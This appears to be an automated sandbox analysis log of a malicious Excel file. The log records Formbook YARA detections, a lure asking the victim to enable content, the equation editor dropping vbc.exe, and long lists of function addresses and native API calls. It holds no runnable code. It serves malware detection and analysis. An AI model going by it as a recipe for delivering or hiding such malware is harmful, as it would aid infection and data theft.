Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: enable Editing and Content from the Yellow bar 21 above to view locked content. 22 ,, 24 25 "
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004030E3
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_022166E8 0_2_022166E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_022166F3 0_2_022166F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02216340 0_2_02216340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02216743 0_2_02216743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02216753 0_2_02216753
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406043 4_2_00406043
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404618 4_2_00404618
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040681A 4_2_0040681A
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000CA10 4_2_1000CA10
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001707B 4_2_1001707B
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001FC94 4_2_1001FC94
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001756F 4_2_1001756F
Source: C:\Users\Public\vbc.exe Code function: 4_2_10017987 4_2_10017987
Source: C:\Users\Public\vbc.exe Code function: 4_2_10017DBC 4_2_10017DBC
Source: C:\Users\Public\vbc.exe Code function: 4_2_100181F1 4_2_100181F1
Source: C:\Users\Public\vbc.exe Code function: 4_2_10020206 4_2_10020206
Source: C:\Users\Public\vbc.exe Code function: 4_2_100222C3 4_2_100222C3
Source: C:\Users\Public\vbc.exe Code function: 4_2_10015AF9 4_2_10015AF9
Source: C:\Users\Public\vbc.exe Code function: 4_2_10020F20 4_2_10020F20
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001D36E 4_2_1001D36E
Source: C:\Users\Public\vbc.exe Code function: 4_2_10020778 4_2_10020778
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8C3 5_2_0041B8C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C090 5_2_0041C090
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040120B 5_2_0040120B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C394 5_2_0041C394
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C7B 5_2_00408C7B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C4D0 5_2_0041C4D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C80 5_2_00408C80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CC86 5_2_0041CC86
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BD0F 5_2_0041BD0F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D8E 5_2_00402D8E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C905A 5_2_007C905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B3040 5_2_007B3040
Source: C:\Users\Public\vbc.exe Code function: 5_2_007DD005 5_2_007DD005
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AE0C6 5_2_007AE0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AE2E9 5_2_007AE2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00851238 5_2_00851238
Source: C:\Users\Public\vbc.exe Code function: 5_2_007FA37B 5_2_007FA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B7353 5_2_007B7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B2305 5_2_007B2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_007D63DB 5_2_007D63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AF3CF 5_2_007AF3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007ED47D 5_2_007ED47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C1489 5_2_007C1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E5485 5_2_007E5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F6540 5_2_007F6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B351F 5_2_007B351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_007CC5F0 5_2_007CC5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00852622 5_2_00852622
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BE6C1 5_2_007BE6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B4680 5_2_007B4680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083579A 5_2_0083579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E57C3 5_2_007E57C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BC7BC 5_2_007BC7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_007D286D 5_2_007D286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BC85C 5_2_007BC85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084F8EE 5_2_0084F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085098E 5_2_0085098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C69FE 5_2_007C69FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B29B2 5_2_007B29B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00835955 5_2_00835955
Source: C:\Users\Public\vbc.exe Code function: 5_2_00863A83 5_2_00863A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085CBA4 5_2_0085CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083DBDA 5_2_0083DBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_007D7B00 5_2_007D7B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AFBD7 5_2_007AFBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BCD5B 5_2_007BCD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E0D3B 5_2_007E0D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084FDDD 5_2_0084FDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_007CEE4C 5_2_007CEE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E2E2F 5_2_007E2E2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_007DDF7C 5_2_007DDF7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C0F3F 5_2_007C0F3F
Source: C:\Users\Public\vbc.exe Code function: 5_1_00401030 5_1_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B8C3 5_1_0041B8C3
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C090 5_1_0041C090
Source: C:\Users\Public\vbc.exe Code function: 5_1_0040120B 5_1_0040120B
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C394 5_1_0041C394
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C7B 5_1_00408C7B
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C4D0 5_1_0041C4D0
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C80 5_1_00408C80
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CC86 5_1_0041CC86
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041BD0F 5_1_0041BD0F
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402D8E 5_1_00402D8E
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402D90 5_1_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402FB0 5_1_00402FB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025A1238 7_2_025A1238
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024FE2E9 7_2_024FE2E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02507353 7_2_02507353
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0254A37B 7_2_0254A37B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02502305 7_2_02502305
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024FF3CF 7_2_024FF3CF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025263DB 7_2_025263DB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0251905A 7_2_0251905A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02503040 7_2_02503040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0252D005 7_2_0252D005
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024FE0C6 7_2_024FE0C6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025A2622 7_2_025A2622
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0250E6C1 7_2_0250E6C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02504680 7_2_02504680
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025357C3 7_2_025357C3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0258579A 7_2_0258579A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0250C7BC 7_2_0250C7BC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0253D47D 7_2_0253D47D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02535485 7_2_02535485
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02511489 7_2_02511489
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02546540 7_2_02546540
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0250351F 7_2_0250351F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0251C5F0 7_2_0251C5F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025B3A83 7_2_025B3A83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02527B00 7_2_02527B00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0258DBDA 7_2_0258DBDA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_024FFBD7 7_2_024FFBD7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025ACBA4 7_2_025ACBA4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0250C85C 7_2_0250C85C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0252286D 7_2_0252286D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0259F8EE 7_2_0259F8EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02585955 7_2_02585955
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025169FE 7_2_025169FE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025A098E 7_2_025A098E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_025029B2 7_2_025029B2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0251EE4C 7_2_0251EE4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02532E2F 7_2_02532E2F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0252DF7C 7_2_0252DF7C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02510F3F 7_2_02510F3F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0250CD5B 7_2_0250CD5B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_02530D3B 7_2_02530D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0259FDDD 7_2_0259FDDD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AC090 7_2_000AC090
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AC4D0 7_2_000AC4D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000AB8C3 7_2_000AB8C3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_00098C7B 7_2_00098C7B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_00098C80 7_2_00098C80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000ACC86 7_2_000ACC86
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_000ABD0F 7_2_000ABD0F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_00092D8E 7_2_00092D8E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_00092D90 7_2_00092D90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_00092FB0 7_2_00092FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 007ADF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007F373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0081F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007F3F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0041A4C0 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 024FDF5C appears 117 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 024FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0256F970 appears 81 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0254373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 02543F92 appears 108 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185E0 NtCreateFile, 5_2_004185E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418690 NtReadFile, 5_2_00418690
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418710 NtClose, 5_2_00418710
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187C0 NtAllocateVirtualMemory, 5_2_004187C0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187BC NtAllocateVirtualMemory, 5_2_004187BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk, 5_2_007A0078
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_007A0048
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk, 5_2_007A00C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk, 5_2_007A07AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F900 NtReadFile,LdrInitializeThunk, 5_2_0079F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F9F0 NtClose,LdrInitializeThunk, 5_2_0079F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0079FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0079FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0079FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0079FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0079FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0079FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0079FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0079FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0079FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0079FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0079FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0060 NtQuerySection, 5_2_007A0060
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A10D0 NtOpenProcessToken, 5_2_007A10D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A1148 NtOpenThread, 5_2_007A1148
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A010C NtOpenDirectoryObject, 5_2_007A010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A01D4 NtSetValueKey, 5_2_007A01D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F8CC NtWaitForSingleObject, 5_2_0079F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F938 NtWriteFile, 5_2_0079F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A1930 NtSetContextThread, 5_2_007A1930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FA50 NtEnumerateValueKey, 5_2_0079FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FA20 NtQueryInformationFile, 5_2_0079FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAB8 NtQueryValueKey, 5_2_0079FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FB50 NtCreateKey, 5_2_0079FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FBE8 NtQueryVirtualMemory, 5_2_0079FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC48 NtSetInformationFile, 5_2_0079FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0C40 NtGetContextThread, 5_2_007A0C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC30 NtOpenProcess, 5_2_0079FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FD5C NtEnumerateKey, 5_2_0079FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A1D80 NtSuspendThread, 5_2_007A1D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FE24 NtWriteVirtualMemory, 5_2_0079FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FF34 NtQueueApcThread, 5_2_0079FF34
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FFFC NtCreateProcessEx, 5_2_0079FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_1_004185E0 NtCreateFile, 5_1_004185E0
Source: C:\Users\Public\vbc.exe Code function: 5_1_00418690 NtReadFile, 5_1_00418690
